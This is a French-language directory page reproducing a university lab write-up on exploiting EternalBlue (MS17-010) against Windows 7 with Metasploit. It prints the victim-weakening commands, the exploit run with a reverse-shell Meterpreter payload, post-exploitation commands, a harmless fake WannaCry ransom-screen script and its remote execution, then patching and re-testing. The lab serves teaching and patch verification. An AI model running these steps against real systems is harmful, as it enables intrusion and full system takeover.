Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
EternalBlue-Exploit-Demonstration — Laboratoire pédagogique démontrant l'exploitation d'EternalBlue (MS17-010) contre Windows 7 à l'aide de Metasploit, incluant la post-exploitation, la simulation du ransomware WannaCry et l'atténuation par correctif dans un environnement isolé. | Kitploit
Outils/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
Frameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitationPost-ExploitationAnalyse de MalwareCTFTests d'IntrusionApprentissage et Éducation
Red Teaming
Labs et Pratique
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

Laboratoire pédagogique démontrant l'exploitation d'EternalBlue (MS17-010) contre Windows 7 à l'aide de Metasploit, incluant la post-exploitation, la simulation du ransomware WannaCry et l'atténuation par correctif dans un environnement isolé.

Voir le dépôt
5il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Démonstration de l'exploit EternalBlue (MS17-010)

Laboratoire de cybersécurité démontrant l'exploitation de CVE-2017-0144 (EternalBlue) à l'aide de Metasploit contre un système Windows 7 vulnérable, obtenant un accès au niveau SYSTEM via Meterpreter.

Ce projet simule également une attaque de ransomware de type WannaCry (DÉMO SANS DANGER) et démontre l'atténuation à l'aide du correctif de sécurité MS17-010.


Informations sur le module

Module : CSCM828 Vulnérabilités de sécurité et tests d'intrusion

Étudiants :

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

Université : Swansea University


Ressources et téléchargements

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Mise à jour de sécurité Windows 7 x64)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Téléchargement des machines virtuelles)
    https://www.kali.org/get-kali/#kali-virtual-machines

  • Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  • VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


  • 1. Présentation générale

    Ce laboratoire démontre :

    • Exploitation à distance de la vulnérabilité SMB (MS17-010)
    • Accès au niveau du noyau via EternalBlue
    • Établissement d'une session Meterpreter
    • Techniques de post-exploitation
    • Simulation de ransomware de type WannaCry (sans danger)
    • Atténuation par l'application de correctifs

    2. Environnement du laboratoire

    Prérequis

    • VMware Workstation / VirtualBox
    • 8 Go de RAM minimum

    Machine de l'attaquant

    • Kali Linux
    • Metasploit Framework

    Machine victime

    • Windows 7 SP1 x64 (non corrigé)

    Réseau

    • Host-only / NAT (environnement isolé)
    • Assurez-vous que les deux machines peuvent communiquer

    ⚠️ Ce laboratoire doit être réalisé dans un environnement entièrement isolé.


    3. Configuration de la victime (Windows 7)

    Exécutez dans l'invite de commandes en mode Administrateur :

    Désactiver le pare-feu

    root@kitploit:~
    netsh advfirewall set allprofiles state off
    

    Vérifier le port SMB

    root@kitploit:~
    netstat -an | findstr :445
    

    Désactiver les mises à jour (pour la stabilité du laboratoire)

    root@kitploit:~
    sc stop wuauserv
    sc config wuauserv start= disabled
    

    4. Configuration de l'attaquant (Kali Linux)

    Vérifier la connectivité

    root@kitploit:~
    ping <victim-ip>
    nmap -p 445 <victim-ip>
    

    5. Étapes d'exploitation

    Étape 1 : Scanner la cible

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    Résultat attendu :

    • L'hôte est VULNÉRABLE

    Étape 2 : Lancer l'exploit

    root@kitploit:~
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS <victim-ip>
    set LHOST <attacker-ip>
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    run
    

    Étape 3 : Confirmer l'accès

    root@kitploit:~
    meterpreter > getuid
    

    Résultat attendu :

    root@kitploit:~
    NT AUTHORITY\SYSTEM
    

    6. Post-exploitation

    root@kitploit:~
    sysinfo
    getuid
    ps
    screenshot
    shell
    whoami
    ipconfig
    

    Migration stable

    root@kitploit:~
    ps
    migrate <explorer.exe PID>
    

    7. Simulation de WannaCry (DÉMO SANS DANGER)

    Créer le payload (Kali)

    root@kitploit:~
    cat > /tmp/wannacry64.bat << 'EOF'
    @echo off
    title WannaCryptor Demo - SAFE SIMULATION
    color 0a
    mode con: cols=80 lines=25
    cls
    
    setlocal enabledelayedexpansion
    
    set id=%random%-%random%-%random%
    set /a timeleft=60
    
    :main
    cls
    echo ========================================================
    echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
    echo ========================================================
    echo.
    echo  All files have been encrypted!
    echo.
    echo  Send 0.25 BTC to:
    echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
    echo.
    echo  Personal ID: %id%
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    echo Initializing encryption...
    timeout /t 2 >nul
    
    for /l %%i in (1,1,20) do (
        set /a percent=%%i*5
        call :progress !percent!
        timeout /t 1 >nul
    )
    
    goto countdown
    
    :progress
    set bar=
    set /a blocks=%1/5
    for /l %%b in (1,1,!blocks!) do set bar=!bar!#
    cls
    echo ========================================================
    echo           ENCRYPTING FILES...
    echo ========================================================
    echo.
    echo Progress: [%bar%] %1%%
    echo.
    
    set /a randfile=%random% %% 5
    if !randfile!==0 echo Encrypting: documents.docx
    if !randfile!==1 echo Encrypting: photos.jpg
    if !randfile!==2 echo Encrypting: database.sql
    if !randfile!==3 echo Encrypting: backup.zip
    if !randfile!==4 echo Encrypting: project.pptx
    
    exit /b
    
    :countdown
    cls
    
    :loop
    cls
    echo ========================================================
    echo           YOUR FILES ARE ENCRYPTED
    echo ========================================================
    echo.
    echo  Pay within the time limit or files will be lost!
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    if !timeleft! LEQ 0 goto end
    
    set /a timeleft-=1
    timeout /t 1 >nul
    goto loop
    
    :end
    cls
    echo ========================================================
    echo              TIME EXPIRED
    echo ========================================================
    echo.
    echo  Your files are permanently locked.
    echo.
    echo  (This was a SAFE DEMO simulation)
    echo.
    echo ========================================================
    pause
    EOF
    

    Téléverser et exécuter

    root@kitploit:~
    meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
    meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
    

    8. Atténuation (Démonstration du correctif)

    Étape 1 : Télécharger le correctif

    • Visitez : https://www.catalog.update.microsoft.com/
    • Recherchez : KB4012212 Windows 7 x64
    • Téléchargez le fichier .msu

    Étape 2 : Installer le correctif

    root@kitploit:~
    wusa.exe KB4012212-x64.msu /quiet /norestart
    

    Étape 3 : Redémarrer

    root@kitploit:~
    shutdown /r /t 0
    

    Étape 4 : Vérifier le correctif

    root@kitploit:~
    systeminfo | findstr KB4012212
    

    Étape 5 : Relancer l'exploit

    Résultat attendu :

    • L'exploit échoue
    • Pas de session Meterpreter

    Étape 6 : Vérifier avec Nmap

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    Résultat attendu :

    • NON VULNÉRABLE

    9. Dépannage

    ProblèmeSolution
    L'exploit échoueVérifiez la connectivité
    Pas de sessionDésactivez le pare-feu
    La session se termineRelancez l'exploit
    Aucune fenêtre visibleMigrez vers explorer.exe

    10. Considérations éthiques

    Ce projet est mené :

    • Uniquement sur des machines de laboratoire contrôlées
    • Dans un réseau entièrement isolé
    • Uniquement à des fins éducatives

    Toute utilisation non autorisée enfreint :

    • UK Computer Misuse Act 1990

    11. Conclusion

    Ce laboratoire démontre :

    • Exploitation SMB réelle à l'aide d'EternalBlue
    • Compromission au niveau SYSTEM de Windows 7
    • Simulation d'attaque ransomware (sans danger)
    • Importance de l'application rapide des correctifs
    Télécharger l’outil